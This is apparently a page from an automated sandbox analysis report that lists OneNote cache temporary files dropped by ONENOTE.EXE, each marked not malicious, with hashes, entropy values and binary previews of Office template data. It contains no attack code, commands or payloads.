C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.48099448391682853
Encrypted:	false
SSDEEP:	6:NTcXllmoOLoOft0iYG0S+tlyLx8Olu3af71sDZcw1EIksDXK:VcvmZb0iIS+XV38SDZcQEIbDa
MD5:	C492BB3DBDB1F9A0800707B004F011DE
SHA1:	0A62ED426F48F15E97ACF982C13AB43D50D774D6
SHA-256:	4420B6201BC536CA8A9FB1C63DBB6D5357B273BBED60348B12C8E18E027E9942
SHA-512:	7DFA29B02698ADDE95BCA14A5E76DB52EB371C3276574ADC677C7889FE05367B0DEDA3CFA78A6B968778600B687C3486934A53CC12F799A9F34A5D619E9FE03E
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................^Gm.....^GmE?..A.&.~O...........................^GmE?..A.&.~O...^Gm..................................................^Gm.....^Gm.................................................^Gm.....^Gm\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3....Q....1N.&.u..=.....N...^............................................................................................................Q....1N.&.u..=.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6490204902933241
Encrypted:	false
SSDEEP:	6:UWBETlkDqZ2hnlmrl+RLx88cbrMkq2Sz1MQQcbrMkq2Sz1pRcw1EaBfK:UeETlcqZMcrYNnkNYKQQnkNYCQEiK
MD5:	F43861A88B500AF58DE1BF7BA3EFB1EF
SHA1:	DA20FAA79258E1BE5C2FBD3F76A14DB91752623B
SHA-256:	DB6E498E342CA365D4159DD8B36772E4AF831B845DE43D2173BD9F90CC132214
SHA-512:	B75180A8029793AB0C6CDEFEF18D17DEDA391D990D471F975E89E3A6E08CE9871A3A9AA1AF404EB964897F819C74B899D51C8FDDFD3B0A8CAF59F2A134A78747
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................=.......=.Y.S.O....1e+.........................=.Y.S.O....1e+.=....................................................=.......=...................................................=..."...=.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...............1...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s...........ML.EfJ.I4...Q`....N...^.............................................................................................................ML.EfJ.I4...Q`............................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7739283676570299
Encrypted:	false
SSDEEP:	12:+wfE0ElDtDtaIRjf/sD4vDwsD4CCQEe9K:+8EdFkIZf/nvDwndy
MD5:	5EC50F9302F97EA78B227E3B915D2A1E
SHA1:	F7703DFA9A97229B29BD797A8F34A1DCAD70706C
SHA-256:	7BE2FCBC6E5D72A543B78EDFF0AB8038201C4D09402256734B9B44FE9ED0C5DD
SHA-512:	A805E150D2E5EF5C3CFCE0913C5A6BD761C069EDBEB044BE187CBE7A50DADAD571E7E80A4AEBEA98386602942939DB85D6D7FDE0DC96D629DE12E0CCD0470601
Malicious:	false
Preview:	2...>................................................................................................................................................................................................................W.O..#kK...P.......P.....D.+78.&h{P.....D.+78.&h{P........W.O..#kK....................................................................................................#.....\.......N....................................................P....c..,.........................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...................1... ..$<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........kl...BI.#.h...J....N...^............................................................................................................kl...BI.#.h...J....................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4834454360694914
Encrypted:	false
SSDEEP:	6:NTcI9+5Emx1kYmliUeyLx8Olu3afevw1EA:VcI9GKeV384QEA
MD5:	3ABEC4A97B3B1D49E53694A1F2F1A5BA
SHA1:	6920B89A6A52D040555ACA04436723B150BDC033
SHA-256:	42CE1E48C420D010DA50208890F6BF1F955EF258782805F8151E986B14F84EC6
SHA-512:	75D3BE5B755E1DF95DF64EE4ECE1EFFFCD5AD9F316532D5D7BF0C1F4F01B686F32A1050798C75E087F2B29661A16F3A1001AF2ECAFB23FF28E4CA2A22CF0A8F0
Malicious:	false
Preview:	2...>...........~.......................................................................................................................................................................................rA......rA..JlHL.`%W...E........................rA..JlHL.`%W...ErA...................................................rA......rA..................................................rA......rA.\..............................................................4..1...(...(.......1.0.3.3.........1.......1.0.3.3.....t..M......F.....N...^.............................................................................................................t..M......F.............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.0033182200385906
Encrypted:	false
SSDEEP:	12:DKtdjn3mk7kswWXDwVuk1+CkHc1C9kLNJ0oXYQEbX1K:DGRXgVuDc12kLN+YYX1
MD5:	23EBB86BD1C98C6E1733263AECF26175
SHA1:	4BD01AAD4CC70EB49F63D1A9393CBFE4F9ACE7CD
SHA-256:	ED71A17C218AE94118B1454C3A032EE7DE60328939401AEED6E4EF972680D92A
SHA-512:	C8AE1E2DE747BBD978AB9E44F0731C63F69DC2053B6D90940EEB0E6F2EEB9971A6BDA9778619A76DBA1936D6E93EEE420A02031BDCB22456F91FEBDD7BB51C4C
Malicious:	false
Preview:	....>..........................?......?.................................................................................................................................................................Q......Q...YEL.Qdr.f.9'.......'.../.F...H..@.<...#!.A..7....z<...'.../.F...H..@.'...Q...YEL.Qdr.f.9Q...........Q......Q..................................................Q...-..Q.\....'..N.(....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t..................'.... ..$..........'.......'...*/.F...H..@.<.......<...#!.A..7....z2...............................Q.......................................<....c..,...................'.... ..$p............,Q..R.N...a.\|............'.... ..$p...........NHu...EH.N.../4........?s...cF.:R........N...^............................................................................................................?s...cF.:R........................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9812483253557147
Encrypted:	false
SSDEEP:	12:BKKe+lPygELZjtaSg/rm1QHMUCaOYyqMQEwqQ:gZjta1/3CaOYyqMMq
MD5:	811B1BBA298AB444DCC75B7CA45BB626
SHA1:	506B1AA0C0921113DE5BA03A677077B00EF7B534
SHA-256:	D4A1A3311E38EB659A2DB0AF8CD9A2F60E3B093F4C0F13438E86A57B2C0B79DE
SHA-512:	E8A979CC4797EF4362123B9D55048541ACC4A51A49950C97CF25CBAD5F15D36A7140461F33F67EF771C1B9834B1F74435544C1AE48481ACCE32536FFD9B5508C
Malicious:	false
Preview:	....>.............................?...?.................................................................................................................................................................P ......P ....ZO.m........9.......9.z..@.s$O.....9.z..@.s$O.....9...\|.B).I........\|.P ....ZO.m......P .............9.......9...................................................9..,....9\......9N......9N.)............................................4..1...(...(.......1.6........................P ...c..,.....................9.. ..$............9.......9.z..@.s$O.....\|.......\|.B).I......2...............................P .........................................\|..c..,.....................9...9.. ..$.............9...9.. ..$p............+,.J.H.ipH.?7L..........-...:.H.ie.p.......N...^...........................................................................................................-...:.H.ie.p.......................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	big endian ispell hash file (?), 8-bit, no capitalization, 26 flags
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.5788405894220894
Encrypted:	false
SSDEEP:	24:4DVrta78VwfvwatA0D7aqCrdiDaIXmJwaK:ea78Gvwa7D7aPJiahJ3
MD5:	6601F97B275E4B79232FCA16CAB45601
SHA1:	607339C3A5BA400869CF90C2F1AA292FA041F0CC
SHA-256:	70D445793178CF5A45FC48C015F4B53A688BF768AAF331AAB1868860BAA94D71
SHA-512:	0EE6722B7E9B54A357FAC65EA5041DA48144D8AB2A8878F635DCBC3D8098B6F80F63C96053720FBD6F5B48FBFF7C12B0BFBAA85EFAB06A86A27A26B030E5E3CB
Malicious:	false
Preview:	........0...............................................................................................................................................................................................,.......,..:.l.N.?Y..M. ....... .....?G....$.}. .....?G....$.}$ ....1..a.G...C.....1..,..:.l.N.?Y..M.,............,.......,...................................................,....C..,..\....,..N....,..N.)..,..N.8..,..N.?............................4..1...(...(.......M.a.n.a.g.e.d...................... ....c..,...................,.... ..$...........l@......l@...gM.,...\|.. ....... .....?G....$.}.2...............................,....l@..1................................l@..c..,...................,...,.... ..$.......1.......1..a.G...C.... ....... .....?G....$.}..l@...gM.,...\|...l@.,..:.l.N.?Y..M.,...A .....N.r..ln.A ......>................1..a.G...C..............................................1...c..,...................,...,...,.... ..$.......... ....... .....?G....$.}$A ......A .....N

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7675686799614715
Encrypted:	false
SSDEEP:	12:bEutniExNvEYT3YXOk8A1kLBJyYQEY1K:NiYC/+kALLd
MD5:	C519305A7352C1DC9C7D8C1ECA6513DD
SHA1:	13260499EB9451440EF53D2F5E8C82DB78383FA3
SHA-256:	36500777ADC7217DE4736AD8D9089AF09E179D8BDDD6B19644EAD524F797752E
SHA-512:	4632A93947AA0E8872E2B56044C45ADE8A883C14B996D795CA3029E9DC17D3821A4FCEC7AD89A5E79CE74142EB9EA08CDD2E337A1D82F4E731BEB49E638117C7
Malicious:	false
Preview:	2...>..............................................................................................................................................................................................................f,.aG.8-=#'...PO......PO.t .M...%\|D....f,.aG.8-=#'.......PO.t .M...%\|D..PO...............................PO......PO..................................................PO..#...PO\.....PON. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........................c..,....................PO.. ..$................PO.. ..$p............)6V_^SC....(B.V........"...H..vf..'`....N...^............................................................................................................."...H..vf..'`............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5251998742119102
Encrypted:	false
SSDEEP:	6:jhzcbp10M/kDDQ3lmDChl7/yLx8Olu3S0t0cA8w1E3JcAA:jRc910ekDDicWz7/V3nlrQECn
MD5:	2B8FDF88B9CEF6BF0D87F8A9CED5D5B5
SHA1:	C19D213F48B8DF4FB6C3724302AE84A0A648BB86
SHA-256:	4434AE3C3BFF89FF05B99CF46F734C6B3BDD205CF9888B2F32DD27ED3CC03F75
SHA-512:	CB04974510D2640BBB2452724279D3C802FE66A61F6F515D031739520327DC8AE320374906E96EC073A76CADC2D35DA3F6B49F9AACA3F73DDCBA7D2CDB26FF05
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................&u......&u..~..M...oa.6.........................&u..~..M...oa.6.&u...................................................&u......&u..................................................&u......&u.\..............................................................4..1...(...(.......1.0.3.3.................p........k..._.K.J.....t..........W.....L.B..... ....N...^...........................................................................................................W.....L.B..... ....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7675394975599898
Encrypted:	false
SSDEEP:	12:D0CnhWXE2WXl/1c6DseIWym01zfHNGPQEeD:QeOEHl/1c6ATmu/N6
MD5:	29F5F51DDA3F22054F1F8904F48CB4A8
SHA1:	B352A541B260621C3FCBF3386392B55BE64333D0
SHA-256:	E3B73E53BDBD1AFA322F2847C707D7AC4958C63F3431C8E55559FC19E6ECC27E
SHA-512:	AED7C1D286B7543BF9EF91104CC8DE2B08BE609CF4F51EC6AC4123B97700D38989E7A273F636475E36DF82D2B792EE2DEE620A994944FD6392AFCD4E93F0FBD4
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................F.......F...dK..-.....\n......\n...K..e.r...F...dK..-......F..\n...K..e.r.\n................................F.......F...................................................F..$....F\......FN. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s...........................\n..c..,.....................F.. ..$.................F.. ..$p...........K.5....L.V)...oA........t..XC..T..O.~....N...^.............................................................................................................t..XC..T..O.~....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5252522261956215
Encrypted:	false
SSDEEP:	6:jhzc0x/Jpa/QedRyLx8Olu3ix6xcw1EQMx6/K:jRcGJpcV3ix6qQE1x6/K
MD5:	37D5356F4C3BE43DDBF6EC501AB4369E
SHA1:	DA4FDE760DEF483A080273C0DA528C6AC4E128D6
SHA-256:	3D4AF3563F08A425C6D5AC87FB8FFEA4CD87AC9BB40E58BDDDD1B030682BF248
SHA-512:	02FB6F28AD315712EF2E448E07160CBF316A704B91B8161F37CC30B556802930369A368985F44FE30E2F97BA4299BDEEF1DD3EB80D7DBF159E58944BF6B52AB6
Malicious:	false
Preview:	2...>...............................................................................................................................................................................................................$f-J.,.nF.W.............................$f-J.,.nF.W............................................................................................................................\..............................................................4..1...(...(.......1.0.3.3.................p...........-.K...a.X.+.........."..!...C.D.5........N...^..........................................................................................................."..!...C.D.5........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6127752188576095
Encrypted:	false
SSDEEP:	6:90C8Le6vmtVOHu6Lx88cbrMkq2Sz1ss9fFVkSY1S8Ot+cw1EfOtMK:eCgs1MnkNYqs9f8TST+cQEqH
MD5:	F1FEECE08ACA75F376BFC194F31E88FC
SHA1:	F36ADCD2D5B1BD1ABECF705C85EA8B5A0567CE87
SHA-256:	D1C4DED5FCB5FA83C75E356500601CBC607E91FBD804F49989693442F143CB3E
SHA-512:	F0A024904C7ED32685BB40516EA9D69A099193522131D5963D1C3B71F880F442175C9DD6D327F4D81CD10831DB801C77D5B7199E3FE722313D86804F8FCDB470
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................{.......{..;I.K....62h.........................{..;I.K....62h.{....................................................{.......{...................................................{..."...{.\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.........jX..0A...V;(...........\....2mF.B()VH!.....N...^...........................................................................................................\....2mF.B()VH!.....................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7870023800544366
Encrypted:	false
SSDEEP:	6:1+E0/Osv+oU3sGoM4i/ogXp3a/I7Lx80cHnD2nHlXllk//zM1vRlC/qmw1EHk0:EEEOsY3sGf/bDvsD49kHQ1bxmQEH
MD5:	1151B1E1C9F084280576A0FB316F6983
SHA1:	B395AAF9B023402EB5009473546DC42FB6805480
SHA-256:	92D809A12F88B50B9BBFD6AEBFF5E0769EECC5D3ACE2EB90FAFDE70DC1505B76
SHA-512:	712B4FBA3D277FFD831E0ADA216722091158B951A68E6EC9C3177DEF601B3AA46F915ED44D7AC0D025206F63F8C23FE25F0CCB79C36C21D15D8C540C82D6599A
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................d,......d,...m.E.....:..4.[.....4.[.\.FG......`.d,...m.E.....:..d,..4.[.\.FG......`.4.[..............................4.[.....4.[.................................................4.[..%..4.[\....4.[N."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s..........................d,...c..,...................4.[.. ..$...............4.[.. ..$p............J.....E.....u........a9..`..L.s..U%......N...^...........................................................................................................a9..`..L.s..U%..............................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5227438662478051
Encrypted:	false
SSDEEP:	6:jhzcW/fHuWKtyLx8Olu35JKye0NPQllqw1ESPQllS:jRcG2TV35JS0pQEw
MD5:	B58426B6F7A513C9B5A30232348FC46C
SHA1:	130F73480BB362AAEFA5E2A6AB36081152732D4B
SHA-256:	FB05D81CE5A11211E472B49AC93D9F9D3408DD9AB107BE639A73442AA222C775
SHA-512:	35BB856E6A8A494DC6E82C1C90762501B1E3C88E0007CFDCBE3430108CA5E543B988D790CFF223D17FAB84870A5A6C2ED4315CA8720E5FBE06DA4730837805FB
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................\R......\R.+.uD....(..........................\R.+.uD....(..\R...................................................\R......\R..................................................\R......\R.\..............................................................4..1...(...(.......1.0.3.3.................p.......p.... .H..wy...............4..].^C....~x.7....N...^............................................................................................................4..].^C....~x.7....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.4398715326060474
Encrypted:	false
SSDEEP:	12:B9UiKfFo7dAXH3ktDLdckcmFFk1p66lkQ+4xWpNKPiVC5O/C9JBFwjnQE+M:ifFuuXUdykLkdxWp0PiQzzanS
MD5:	2EE819D0E14D22E8233DCCB60A8C887E
SHA1:	046A4179258121761C0191BD5C8BE4398A21C8D8
SHA-256:	A40F56A035830E219BDFF44C73F1211FF1D7ABE8ED2E63F6DE2F8B216A77D8C5
SHA-512:	71469665FE0E771D26D4B4D749636DD764924F662FC129E38CBF8B0E6579CB6E09066CFB63315D9901EAD6C4146D8A53BAB732891752EF9092088E3131E4AD64
Malicious:	false
Preview:	........".........................?......................................................................................................................................................................T.......T..+.kJ...@N.Fg..3.......3...@......:..3...@......:..3.q=...$A.7.\'%..q=...<....WG..f.....<............<.......<...................................................<...?...<.\.....<.N.....<.N.)...<.N.4...<.N.;............................4..1...(...(.......U.s.e.r......................3..c..,....................<... ..$..........I.......I..8..I.i.......<.......<....WG..f....2.................................3.I....................................I....c..,....................<...<... ..$......I..8..I.i......I....T..+.kJ...@N.Fg.T..........................>................<....WG..f..............................................T...c..,....................<...<...<... ..$...........<.......<....WG..f....q=......q=...$A.7.\'%...........q=...c..,....................<...<...<.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7612130456313341
Encrypted:	false
SSDEEP:	12:bEiUsHfTnHICO/SMJkFm/7YXso561FD3uulqQE0lS:lxO8WU9mD3Blq4l
MD5:	9A3C9C2F40E1B4791DE6C4D0AEA94434
SHA1:	02D396431F9EDE7E64863B62A0526317D3BB19F1
SHA-256:	C11A106D3622508A86A2708C0F73B443E0C453FF50163787A8F648A6C435FAC6
SHA-512:	B7C5A00B43AD420285BD43F11AE9A1F299A4DA40A27E90D339BDC873997AC05A5EBC57B9C4B6348504C06025F43BB3FC3B33E53604BE50FDF1FB0422A5FB8EAA
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................f.f.....f.f.}..J.P..io.i...........yn..O..=b.U..f.f.}..J.P..io.if.f....yn..O..=b.U....................................................................................................#.....\.......N. ....................................................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s......................f.f..c..,........................ ..$.................... ..$p............I.s.0VH.Q...R...........tJJ.....S......N...^................................................................................................................tJJ.....S..............................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.525239104172914
Encrypted:	false
SSDEEP:	6:jhzcK+1uFAFOIBSQtyLx8Olu3FoCm//ww1EY//M:jRcsIBDV3FomQEx
MD5:	2FC7AA8E6872FCA4A765DD16576CF8FA
SHA1:	6A038926A1DFF5A6446F8F56E924222720E010E8
SHA-256:	BA5DE075716D5ECC524FE08C0F595086E9D9F28F402A8130272E3207B6E1D3EE
SHA-512:	E04715BE038C7D8B10F519D0C25CF8CFC809E1E635F08DFA73FFAF34DB162B2190E8510E5D6CDD7DFE306A8186944D614F7E84D7E36FDEC4FD5F6FC861C6CCC2
Malicious:	false
Preview:	2...>.................................................................................................................................................................................................... ....... .5..M... ............................. .5..M... ..... .................................................... ....... ................................................... ....... .\..............................................................4..1...(...(.......1.0.3.3.................p..........K...E.n.-.wn..............m.NeJ.] .h{......N...^..............................................................................................................m.NeJ.] .h{......................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7710388671251535
Encrypted:	false
SSDEEP:	6:D0CoktQeVbSl/cRARxFmtXlrLx8felBkls0Clg2/619RlTfC0CBw1E70Cx:D0CTFSaKbw9lrseIWu2C19D7aQER
MD5:	290CCE3107E04F9F9AAF5B51C5E05D23
SHA1:	3C0B4D484988F435B6DA1EA1FCEE8A3A79015CDA
SHA-256:	49C5BFE32059BE6E5F0795DCB62C006B809C03734466A281AE96185235256511
SHA-512:	9AA91762DE8862CC6CA401DD5585BCEB9C3C843DB0C8F8B0FF4BCC6AF1BBCF8739F88356414A2374108EACD8EFDAE408C9B4601B9367298757272E5BDCC64A4B
Malicious:	false
Preview:	2...>...................................................................................................................................................................................................uP`.....uP`3..YG.fQ..))..........Tj.GC...&....Tj.GC...&.....uP`3..YG.fQ..)).uP`............................................................................................$....\......N. ....................................................4..1...(...(...$...S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s..........................uP`..c..,....................... ..$................... ..$p...........[SMR.5.D....V.........1.\...M...9..9.....N...^............................................................................................................1.\...M...9..9.....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5217077581165882
Encrypted:	false
SSDEEP:	6:jhzcMgnYf/TLYYltl4l8q4qlyLx8Olu3Y3FMcxcw1Ek/K:jRcXYDUYHoV3Y3FXqQEk/K
MD5:	B9D62E00F18573D9519C845BEDCE18F0
SHA1:	06F16D802D40468FCB2F5A8D08EA779834857E3B
SHA-256:	D16ABFEED23EBB711C1E3B9F67AC1A92658076EDE1EF84E84A71BC4730FBFA27
SHA-512:	6A4C909F0B63430A46ADD4EAC1DEE26914A72AA2129D6CF42676E0F0A866DAC940FF1E06CAE2950341AF46E4F6147EB8F248CC77CD48D2C6BD8B4B75DCACE7CC
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................m.......m.C...C.(.n...........................m.C...C.(.n...m....................................................m.......m...................................................m.......m.\..............................................................4..1...(...(.......1.0.3.3.................p.......Fh..(..G.:y...n...........'.koN.:K..F...T....N...^...........................................................................................................'.koN.:K..F...T....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.6118632712273583
Encrypted:	false
SSDEEP:	6:90CXetrzxKPll44tsLx88cbrMkq2Sz1sJKIt7XIlHYHw1E4lHYL:eCahKdS4tqnkNYqJDIhYHQE4hYL
MD5:	D69B671D3ACF8F5FCD0E7BEC33CB349F
SHA1:	558C3C38C542E27627E1FBE2F59600D49BD2B9DF
SHA-256:	5DE1F62D51C2EDE33A181F56E30FFF34DF48B14569D34AB557A266B2A8B6B3F8
SHA-512:	68D5D91739C35FF404D8DDD9DA2F093C41CF2EC1F90396BC63A9112EB391F573887C6E679C3BE24731C2C690BFAA4B4F5299047E9B7C542C7C8B3F10FCA401E4
Malicious:	false
Preview:	2...>.....................................................................................................................................................................................................p.......p....H..."c/............................p....H..."c/....p....................................................p.......p...................................................p.."....p\..............................................................4..1...(...(...D...W.o.r.d. .D.o.c.u.m.e.n.t. .B.i.b.l.i.o.g.r.a.p.h.y. .S.t.y.l.e.s.......................p.......c>.(..@..xK.i.............D.c...B....>\.....N...^............................................................................................................D.c...B....>\.....................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8075556075181776
Encrypted:	false
SSDEEP:	12:EER8z2ybrtvsD41MmsM1Zm/uHqQEuHl0:azbrJn1nsX//w
MD5:	9508BFDEBADDF6E96176CDDA94D4EB66
SHA1:	8FE8A8B4AD4C1F570080DA0203A67BBC322243E5
SHA-256:	A508B10D987326FDF5703175BEB02A80A067F60BE099E1F8BD27809BAC3DF99A
SHA-512:	25A377D46F7460C31B955F341F246216DA88DCAE174D039FE6B1DB26064038847E9F6594F0056E74DFF59EF14FF28B17643C72900FBFCA49A863C090AB00C27A
Malicious:	false
Preview:	2...>................................................................................................................................................................................................................kG.....N..............[K..E...S.....kG.....N..........[K..E...S..................................................................................................%.....\.......N."....................................................4..1...(...(...<...W.o.r.d. .D.o.c.u.m.e.n.t. .B.u.i.l.d.i.n.g. .B.l.o.c.k.s...............................c..,........................ ..$.................... ..$p...............>..M..(.M..........KD..D.$.H.......N...^............................................................................................................KD..D.$.H...............................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5233474523157299
Encrypted:	false
SSDEEP:	6:jhzc2lYFVnIgqrMyLx8Olu3hl1bBd6ww1EsABd6M:jRc2lYFVIRgV3P1tfQEDT
MD5:	917A65D90BCD5A3FDC5205E66033CE41
SHA1:	1E1F521E0BDFA6A5458CCCA056F05D2A57EB9C22
SHA-256:	C7CA85ABA05E8E473E27588ECF06528F354B508D9FC9A629E73D014263E40029
SHA-512:	C1471ABBCBE162EEE9C008CC216B8780CA6C2F8BC164A57275B97D5A5B11431A13AE50B9A8899FC233BB885C8804CE8BC34C7DB29F98093481FC6FFC9E31F444
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................s-......s-...L....Q.(%.........................s-...L....Q.(%.s-...................................................s-......s-..................................................s-......s-\..............................................................4..1...(...(.......1.0.3.3.................p........._....D.....Y"...........~].>.<nA..w..Ay.....N...^...........................................................................................................~].>.<nA..w..Ay.....................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.7307510214359536
Encrypted:	false
SSDEEP:	48:NsWoa6oXMBbkFbGCZtUEwh3XWK983l1N0rdQVrdEr5tXKrZl9:NsdOXMVkBGCZWE43XWK9sl1GRQ5Q56
MD5:	7E98492F0F6DA5373B6AD1316EC4AA84
SHA1:	FB9C47FEB17D525F605BF523ECF30D16AD0A9D78
SHA-256:	D95C7365C3D97C628C6CCB1705CEDF72D58D74A20F9AC0F4A07AC5F85B5BAE17
SHA-512:	5BFEF66FDA3109407A028DBC0C25C069CBB03C2E54146B2BD3EFAE466598202E23574FE55961CC54B4E70F21723CA2DDE05DD1632AA77237DF0C4A57F9884386
Malicious:	false
